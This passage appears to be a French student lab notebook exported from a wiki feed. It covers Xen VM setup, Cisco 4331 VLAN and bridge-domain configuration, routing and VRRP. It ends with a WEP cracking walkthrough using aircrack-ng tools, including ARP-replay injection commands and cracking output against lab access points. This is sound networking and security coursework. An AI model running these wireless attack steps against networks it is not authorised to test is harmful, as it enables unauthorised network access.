&lt;br /&gt;
Allocation des tables de groupe : complété                        &lt;br /&gt;
Écriture des tables d'i-noeuds : complété                        &lt;br /&gt;
Création du journal (32768 blocs) : complété&lt;br /&gt;
Écriture des superblocs et de l'information de comptabilité du système de&lt;br /&gt;
fichiers : complété&amp;lt;/pre&amp;gt;&lt;br /&gt;
On monte la partition : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# mount -t ext4 /dev/mapper/home /mnt/&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous avons écrit dans la carte SD, et nous avons démonté la partition et fermé la partition crypté: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Rason:/# umount /mnt&lt;br /&gt;
root@Rason:/# cryptsetup luksClose home&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35446</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35446"/>
				<updated>2016-11-28T10:55:17Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Securisation de site par SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère séance ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e et 3e séance (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e séance====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5e séance====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
